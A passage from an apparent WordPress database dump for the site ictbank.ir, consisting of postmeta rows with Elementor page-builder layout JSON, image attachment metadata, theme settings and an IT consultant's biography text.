center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3915,783,'_elementor_pro_version','3.13.2'),
(3916,783,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3918,784,'_elementor_edit_mode','builder'),
(3919,784,'_elementor_template_type','wp-page'),
(3920,784,'_elementor_version','3.20.4'),
(3921,784,'_wp_page_template','default'),
(3922,784,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=accent\",\"classic_meta_color\":\"globals\\/colors?id=text\",\"classic_excerpt_color\":\"globals\\/colors?id=text\",\"classic_read_more_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3924,784,'_elementor_pro_version','3.13.2'),
(3925,784,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3927,785,'_elementor_source','post'),
(3928,785,'_elementor_edit_mode','builder'),
(3929,785,'_elementor_template_type','header'),
(3930,785,'_elementor_version','3.12.2'),
(3931,785,'_elementor_pro_version','3.12.3'),
(3932,785,'_wp_page_template','default'),
(3933,785,'_elementor_data','[{\"id\":\"26f7bc3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"293e0f3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":20}},\"elements\":[{\"id\":\"8ab8263\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true},{\"id\":\"6a3646c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column-reverse\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":80}},\"elements\":[{\"id\":\"af2cd87\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main-menu\",\"__globals__\":{\"color_menu_item\":\"globals\\/colors?id=text\",\"color_menu_item_hover\":\"globals\\/colors?id=accent\",\"pointer_color_menu_item_hover\":\"globals\\/colors?id=secondary\",\"color_menu_item_active\":\"globals\\/colors?id=accent\"}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"3388447\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(3935,785,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),
(3939,786,'_wp_attached_file','2021/05/logo.png'),
(3940,786,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:938;s:6:\"height\";i:938;s:4:\"file\";s:16:\"2021/05/logo.png\";s:8:\"filesize\";i:72160;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"logo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27921;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12704;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"logo-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77729;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3941,787,'_elementor_edit_mode','builder'),
(3942,787,'_elementor_template_type','kit'),
(3943,787,'_elementor_version','3.20.4'),
(3944,787,'_wp_page_template','default'),
(3945,787,'_elementor_page_settings','a:17:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#191919\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#750E21\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#BED754\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#E3651D\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:10:\"ictbank.ir\";s:26:\"body_background_background\";s:7:\"classic\";s:25:\"mobile_browser_background\";s:7:\"#FF0000\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:15:\"activeItemIndex\";i:1;s:9:\"site_logo\";a:5:{s:3:\"url\";s:63:\"http://ictbank.ir/blog/wp-content/uploads/2020/02/ictbank-1.png\";s:2:\"id\";i:93;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:10:\"ictbank.ir\";s:6:\"source\";s:7:\"library\";}s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:11:\"__globals__\";a:1:{s:21:\"body_background_color\";s:25:\"globals/colors?id=primary\";}}'),
(3946,787,'_elementor_data','[]'),
(3948,787,'_elementor_pro_version','3.13.2'),
(3954,788,'_elementor_source','post'),
(3955,788,'_elementor_edit_mode','builder'),
(3956,788,'_elementor_template_type','header'),
(3957,788,'_elementor_version','3.20.4'),
(3958,788,'_elementor_pro_version','3.13.2'),
(3959,788,'_wp_page_template','default'),
(3960,788,'_elementor_data','[{\"id\":\"26f7bc3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"6a3646c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column-reverse\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":80}},\"elements\":[{\"id\":\"af2cd87\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main-menu\",\"__globals__\":{\"color_menu_item\":\"globals\\/colors?id=text\",\"color_menu_item_hover\":\"globals\\/colors?id=accent\",\"pointer_color_menu_item_hover\":\"globals\\/colors?id=secondary\",\"color_menu_item_active\":\"globals\\/colors?id=accent\"},\"align_items\":\"center\",\"full_width\":\"stretch\",\"text_align\":\"center\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"menu_typography_font_size_tablet\":{\"unit\":\"custom\",\"size\":\"\",\"sizes\":[]},\"menu_typography_font_size_mobile\":{\"unit\":\"custom\",\"size\":\"\",\"sizes\":[]},\"menu_typography_font_weight\":\"900\",\"pointer_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"293e0f3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":20}},\"elements\":[{\"id\":\"8ab8263\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true}],\"isInner\":false}]'),
(3962,788,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),
(3973,790,'_elementor_source','post'),
(3974,790,'_elementor_edit_mode','builder'),
(3975,790,'_elementor_template_type','header'),
(3976,790,'_elementor_version','3.20.4'),
(3977,790,'_elementor_pro_version','3.13.2'),
(3978,790,'_wp_page_template','default'),
(3979,790,'_elementor_data','[{\"id\":\"26f7bc3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true},\"flex_justify_content\":\"space-around\"},\"elements\":[{\"id\":\"6a3646c\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column-reverse\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":77.085},\"_flex_size\":\"none\",\"_element_width\":\"initial\"},\"elements\":[{\"id\":\"af2cd87\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main-menu\",\"__globals__\":{\"color_menu_item\":\"globals\\/colors?id=text\",\"color_menu_item_hover\":\"globals\\/colors?id=accent\",\"pointer_color_menu_item_hover\":\"globals\\/colors?id=secondary\",\"color_menu_item_active\":\"globals\\/colors?id=accent\"},\"align_items\":\"center\",\"full_width\":\"stretch\",\"text_align\":\"center\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"menu_typography_font_size_tablet\":{\"unit\":\"custom\",\"size\":\"\",\"sizes\":[]},\"menu_typography_font_size_mobile\":{\"unit\":\"custom\",\"size\":\"\",\"sizes\":[]},\"menu_typography_font_weight\":\"900\",\"pointer_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"293e0f3\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":20}},\"elements\":[{\"id\":\"8ab8263\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true}],\"isInner\":false}]'),
(3981,790,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),
(3985,630,'_yoast_wpseo_estimated-reading-time-minutes','1'),
(3986,630,'_yoast_wpseo_wordproof_timestamp',''),
(3987,51,'_elementor_edit_mode','builder'),
(3988,51,'_elementor_template_type','wp-page'),
(3989,51,'_elementor_version','3.20.4'),
(3990,51,'_elementor_pro_version','3.13.2'),
(3991,791,'_wp_attached_file','2024/04/HIXQ6420.jpg'),
(3992,791,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:20:\"2024/04/HIXQ6420.jpg\";s:8:\"filesize\";i:121578;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"HIXQ6420-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12063;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"HIXQ6420-1024x853.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96494;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"HIXQ6420-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4231;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"HIXQ6420-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57636;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3993,792,'_wp_page_template','default'),
(3994,792,'_elementor_edit_mode','builder'),
(3995,792,'_elementor_template_type','wp-page'),
(3996,792,'_elementor_version','3.20.4'),
(3997,792,'_elementor_pro_version','3.13.2'),
(3998,793,'_wp_page_template','default'),
(3999,793,'_elementor_edit_mode','builder'),
(4000,793,'_elementor_template_type','wp-page'),
(4001,793,'_elementor_version','3.20.4'),
(4002,793,'_elementor_pro_version','3.13.2'),
(4003,51,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"dotted\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"d64d431\",\"elType\":\"widget\",\"settings\":{\"title\":\"My Resume\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/CV-DBA.pdf\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"__globals__\":{\"title_color\":\"globals\\/colors?id=accent\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}]'),
(4006,794,'_wp_page_template','default'),
(4007,794,'_elementor_edit_mode','builder'),
(4008,794,'_elementor_template_type','wp-page'),
(4009,794,'_elementor_version','3.20.4'),
(4010,794,'_elementor_pro_version','3.13.2'),
(4011,794,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"groove\",\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4015,795,'_wp_page_template','default'),
(4016,795,'_elementor_edit_mode','builder'),
(4017,795,'_elementor_template_type','wp-page'),
(4018,795,'_elementor_version','3.20.4'),
(4019,795,'_elementor_pro_version','3.13.2'),
(4020,795,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"groove\",\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0e